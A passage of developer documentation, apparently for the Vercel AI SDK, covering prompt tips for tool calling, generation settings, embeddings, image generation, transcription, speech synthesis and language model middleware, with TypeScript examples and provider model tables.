'decline': User chose not to provide the information.
'cancel': User cancelled the operation entirely.

Examples

You can see MCP in action in the following examples:

title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.

Prompt Engineering

Tips

Prompts for Tools

When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.

Here are a few tips to help you get the best results:

Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
Keep the number of tools low, e.g. to 5 or less.
Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.

In general, the goal should be to give the model all information it needs in a clear way.

Tool & Structured Data Schemas

The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.

Zod Dates

const result = await generateObject({
  model: __MODEL__,
  schema: z.object({
    events: z.array(
      z.object({
        event: z.string(),
        date: z
          .string()
          .date()
          .transform(value => new Date(value)),
      }),
    ),
  }),
  prompt: 'List 5 important events from the year 2000.',
});

Optional Parameters

When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.

For maximum compatibility, optional parameters should use .nullable() instead of .optional():

// This may fail with strict schema validation
const failingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().optional(), // This can cause errors
    timeout: z.string().optional(),
  }),
});

// This works with strict schema validation
const workingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().nullable(), // Use nullable instead
    timeout: z.string().nullable(),
  }),
});

Temperature Settings

For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:

const result = await generateText({
  model: __MODEL__,
  temperature: 0, // Recommended for tool calls
  tools: {
    myTool: tool({
      description: 'Execute a command',
      inputSchema: z.object({
        command: z.string(),
      }),
    }),
  },
  prompt: 'Execute the ls command',
});

Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:

Generate structured data with specific formats
Make precise tool calls with correct parameters
Follow strict schemas consistently

Debugging

Inspecting Warnings

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.warnings);

HTTP Request Bodies

You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.

Request bodies are available via the request.body property of the response:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.request.body);

title: Settings description: Learn how to configure the AI SDK.

Settings

Large language models (LLMs) typically provide settings to augment their output.

All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:

const result = await generateText({
  model: __MODEL__,
  maxOutputTokens: 512,
  temperature: 0.3,
  maxRetries: 5,
  prompt: 'Invent a new holiday and describe its traditions.',
});

`maxOutputTokens`

Maximum number of tokens to generate.

`temperature`

Temperature setting.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means almost deterministic results, and higher values mean more randomness.

It is recommended to set either temperature or topP, but not both.

In AI SDK 5.0, temperature is no longer set to 0 by default.

`topP`

Nucleus sampling.

It is recommended to set either temperature or topP, but not both.

`topK`

Only sample from the top K options for each subsequent token.

Used to remove "long tail" low probability responses. Recommended for advanced use cases only. You usually only need to use temperature.

`presencePenalty`

The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`frequencyPenalty`

The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`stopSequences`

The stop sequences to use for stopping the text generation.

If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.

`seed`

It is the seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.

`maxRetries`

Maximum number of retries. Set to 0 to disable retries. Default: 2.

`abortSignal`

An optional abort signal that can be used to cancel the call.

The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout.

Example: Timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  abortSignal: AbortSignal.timeout(5000), // 5 seconds
});

`headers`

Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  headers: {
    'Prompt-Id': 'my-prompt-id',
  },
});

title: Embeddings description: Learn how to embed values with the AI SDK.

Embeddings

Embedding a Single Value

The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases or clustering text. You can use it with embeddings models, e.g. openai.textEmbeddingModel('text-embedding-3-large') or mistral.textEmbeddingModel('mistral-embed').

import { embed } from 'ai';
import { openai } from '@ai-sdk/openai';

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

The AI SDK provides the embedMany function for this purpose. Similar to embed, you can use it with embeddings models, e.g. openai.textEmbeddingModel('text-embedding-3-large') or mistral.textEmbeddingModel('mistral-embed').

import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Embedding Similarity

import { openai } from '@ai-sdk/openai';
import { cosineSimilarity, embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});

console.log(
  `cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);

Token Usage

Many providers charge based on the number of tokens used to generate embeddings. Both embed and embedMany provide token usage information in the usage property of the result object:

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding, usage } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(usage); // { tokens: 10 }

Settings

Provider Options

Embedding model settings can be configured using providerOptions for provider-specific parameters:

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // Reduce embedding dimensions
    },
  },
});

Parallel Requests

The embedMany function now supports parallel processing with configurable maxParallelCalls to optimize performance:

import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';

const { embeddings, usage } = await embedMany({
  maxParallelCalls: 2, // Limit parallel requests
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Retries

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

Both embed and embedMany accept an optional abortSignal parameter of type AbortSignal that you can use to abort the embedding process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

Both embed and embedMany accept an optional headers parameter of type Record<string, string> that you can use to add custom headers to the embedding request.

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Response Information

Both embed and embedMany return response information that includes the raw provider response:

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding, response } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(response); // Raw provider response

Embedding Providers & Models

Several providers offer embedding models:

Provider	Model	Embedding Dimensions
OpenAI	`text-embedding-3-large`	3072
OpenAI	`text-embedding-3-small`	1536
OpenAI	`text-embedding-ada-002`	1536
Google Generative AI	`gemini-embedding-001`	3072
Google Generative AI	`gemini-embedding-2-preview`	3072
Mistral	`mistral-embed`	1024
Cohere	`embed-english-v3.0`	1024
Cohere	`embed-multilingual-v3.0`	1024
Cohere	`embed-english-light-v3.0`	384
Cohere	`embed-multilingual-light-v3.0`	384
Cohere	`embed-english-v2.0`	4096
Cohere	`embed-english-light-v2.0`	1024
Cohere	`embed-multilingual-v2.0`	768
Amazon Bedrock	`amazon.titan-embed-text-v1`	1536
Amazon Bedrock	`amazon.titan-embed-text-v2:0`	1024

title: Image Generation description: Learn how to generate images with the AI SDK.

Image Generation

Image generation is an experimental feature.

The AI SDK provides the generateImage function to generate images based on a given prompt using an image model.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
});

You can access the image data using the base64 or uint8Array properties:

const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data

Settings

Size and Aspect Ratio

Depending on the model, you can either specify the size or the aspect ratio.

Size

The size is specified as a string in the format {width}x{height}. Models only support a few sizes, and the supported sizes are different for each model and provider.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
});

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { experimental_generateImage as generateImage } from 'ai';
import { vertex } from '@ai-sdk/google-vertex';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'Santa Claus driving a Cadillac',
  aspectRatio: '16:9',
});

Generating Multiple Images

generateImage also supports generating multiple images at once:

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { images } = await generateImage({
  model: openai.image('dall-e-2'),
  prompt: 'Santa Claus driving a Cadillac',
  n: 4, // number of images to generate
});

If needed, you can override this behavior using the maxImagesPerCall setting when generating your image. This is particularly useful when working with new or custom models where the default batch size might not be optimal:

const { images } = await generateImage({
  model: openai.image('dall-e-2'),
  prompt: 'Santa Claus driving a Cadillac',
  maxImagesPerCall: 5, // Override the default batch size
  n: 10, // Will make 2 calls of 5 images each
});

Providing a Seed

You can provide a seed to the generateImage function to control the output of the image generation process. If supported by the model, the same seed will always produce the same image.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  seed: 1234567890,
});

Provider-specific Settings

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
  providerOptions: {
    openai: { style: 'vivid', quality: 'hd' },
  },
});

Abort Signals and Timeouts

generateImage accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the image generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateImage accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the image generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { image, warnings } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
});

Additional provider-specific meta data

Some providers expose additional meta data for the result overall or per image.

const prompt = 'Santa Claus driving a Cadillac';

const { image, providerMetadata } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt,
});

const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;

console.log({
  prompt,
  revisedPrompt,
});

The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. An images key is always present in the metadata and is an array with the same length as the top level images key.

Error Handling

When generateImage cannot generate a valid image, it throws a AI_NoImageGeneratedError.

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Generating Images with Language Models

Some language models such as Google gemini-2.5-flash-image-preview support multi-modal outputs including images. With such models, you can access the generated images using the files property of the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image-preview'),
  prompt: 'Generate an image of a comic cat',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // The file object provides multiple data formats:
    // Access images as base64 string, Uint8Array binary data, or check type
    // - file.base64: string (data URL format)
    // - file.uint8Array: Uint8Array (binary data)
    // - file.mediaType: string (e.g. "image/png")
  }
}

Image Models

Provider	Model	Support sizes (`width x height`) or aspect ratios (`width : height`)
xAI Grok	`grok-2-image`	1024x768 (default)
OpenAI	`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
OpenAI	`dall-e-3`	1024x1024, 1792x1024, 1024x1792
OpenAI	`dall-e-2`	256x256, 512x512, 1024x1024
Amazon Bedrock	`amazon.nova-canvas-v1:0`	320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels
Fal	`fal-ai/flux/dev`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-lora`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/fast-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-pro/v1.1-ultra`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/ideogram/v2`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/recraft-v3`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/stable-diffusion-3.5-large`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/hyper-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
DeepInfra	`stabilityai/sd3.5`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`black-forest-labs/FLUX-1.1-pro`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-schnell`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-dev`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-pro`	256-1440 (multiples of 32)
DeepInfra	`stabilityai/sd3.5-medium`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`stabilityai/sdxl-turbo`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
Replicate	`black-forest-labs/flux-schnell`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Replicate	`recraft-ai/recraft-v3`	1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024
Google	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Fireworks	`accounts/fireworks/models/flux-1-dev-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/flux-1-schnell-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/japanese-stable-diffusion-xl`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/playground-v2-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/SSD-1B`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Luma	`photon-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Luma	`photon-flash-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Together.ai	`stabilityai/stable-diffusion-xl-base-1.0`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev-lora`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-canny`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-depth`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-redux`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell-Free`	512x512, 768x768, 1024x1024
Black Forest Labs	`flux-kontext-pro`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-kontext-max`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1-ultra`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.0-fill`	From 3:7 (portrait) to 7:3 (landscape)

Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Transcription description: Learn how to transcribe audio with the AI SDK.

Transcription

Transcription is an experimental feature.

The AI SDK provides the transcribe function to transcribe audio using a transcription model.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.

To access the generated transcript:

const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available

Settings

Provider-Specific settings

Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      timestampGranularities: ['word'],
    },
  },
});

Download Size Limits

When audio is a URL, the SDK downloads the file with a default 2 GiB size limit. You can customize this using createDownload:

import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});

You can also provide a fully custom download function:

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: async ({ url }) => {
    const res = await myAuthenticatedFetch(url);
    return {
      data: new Uint8Array(await res.arrayBuffer()),
      mediaType: res.headers.get('content-type') ?? undefined,
    };
  },
});

If a download exceeds the size limit, a DownloadError is thrown:

import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: new URL('https://example.com/audio.mp3'),
  });
} catch (error) {
  if (DownloadError.isInstance(error)) {
    console.log('Download failed:', error.message);
  }
}

Abort Signals and Timeouts

transcribe accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the transcription process or set a timeout.

This is particularly useful when combined with URL downloads to prevent long-running requests:

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});

Custom Headers

transcribe accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the transcription request.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

const warnings = transcript.warnings;

Error Handling

When transcribe cannot generate a valid transcript, it throws a AI_NoTranscriptGeneratedError.

This error can arise for any the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the transcription model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_transcribe as transcribe,
  NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: await readFile('audio.mp3'),
  });
} catch (error) {
  if (NoTranscriptGeneratedError.isInstance(error)) {
    console.log('NoTranscriptGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Transcription Models

Provider	Model
OpenAI	`whisper-1`
OpenAI	`gpt-4o-transcribe`
OpenAI	`gpt-4o-mini-transcribe`
ElevenLabs	`scribe_v1`
ElevenLabs	`scribe_v1_experimental`
Groq	`whisper-large-v3-turbo`
Groq	`distil-whisper-large-v3-en`
Groq	`whisper-large-v3`
Azure OpenAI	`whisper-1`
Azure OpenAI	`gpt-4o-transcribe`
Azure OpenAI	`gpt-4o-mini-transcribe`
Rev.ai	`machine`
Rev.ai	`low_cost`
Rev.ai	`fusion`
Deepgram	`base` (+ variants)
Deepgram	`enhanced` (+ variants)
Deepgram	`nova` (+ variants)
Deepgram	`nova-2` (+ variants)
Deepgram	`nova-3` (+ variants)
Gladia	`default`
AssemblyAI	`best`
AssemblyAI	`nano`
Fal	`whisper`
Fal	`wizper`

Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Speech description: Learn how to generate speech from text with the AI SDK.

Speech

Speech is an experimental feature.

The AI SDK provides the generateSpeech function to generate speech from text using a speech model.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
});

Language Setting

You can specify the language for speech generation (provider support varies):

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const audio = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hola, mundo!',
  language: 'es', // Spanish
});

To access the generated audio:

const audio = audio.audioData; // audio data e.g. Uint8Array

Settings

Provider-Specific settings

You can set model-specific settings with the providerOptions parameter.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      // ...
    },
  },
});

Abort Signals and Timeouts

generateSpeech accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the speech generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateSpeech accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the speech generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
});

const warnings = audio.warnings;

Error Handling

When generateSpeech cannot generate a valid audio, it throws a AI_NoSpeechGeneratedError.

This error can arise for any the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the speech model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_generateSpeech as generateSpeech,
  NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await generateSpeech({
    model: openai.speech('tts-1'),
    text: 'Hello, world!',
  });
} catch (error) {
  if (NoSpeechGeneratedError.isInstance(error)) {
    console.log('AI_NoSpeechGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Speech Models

Provider	Model
OpenAI	`tts-1`
OpenAI	`tts-1-hd`
OpenAI	`gpt-4o-mini-tts`
ElevenLabs	`eleven_v3`
ElevenLabs	`eleven_multilingual_v2`
ElevenLabs	`eleven_flash_v2_5`
ElevenLabs	`eleven_flash_v2`
ElevenLabs	`eleven_turbo_v2_5`
ElevenLabs	`eleven_turbo_v2`
LMNT	`aurora`
LMNT	`blizzard`
Hume	`default`

Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models

Language Model Middleware

Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.

Using Language Model Middleware

import { wrapLanguageModel } from 'ai';

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: yourLanguageModelMiddleware,
});

The wrapped language model can be used just like any other language model, e.g. in streamText:

const result = streamText({
  model: wrappedLanguageModel,
  prompt: 'What cities are in the United States?',
});

Multiple middlewares

You can provide multiple middlewares to the wrapLanguageModel function. The middlewares will be applied in the order they are provided.

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: [firstMiddleware, secondMiddleware],
});

// applied as: firstMiddleware(secondMiddleware(yourModel))

Built-in Middleware

The AI SDK comes with several built-in middlewares that you can use to configure language models:

extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
defaultSettingsMiddleware: Applies default settings to a language model.

Extract Reasoning

Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.

The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.

import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Simulate Streaming

import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: simulateStreamingMiddleware(),
});

Default Settings

The defaultSettingsMiddleware function can be used to apply default settings to a language model.

import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: defaultSettingsMiddleware({
    settings: {
      temperature: 0.5,
      maxOutputTokens: 800,
      providerOptions: { openai: { store: false } },
    },
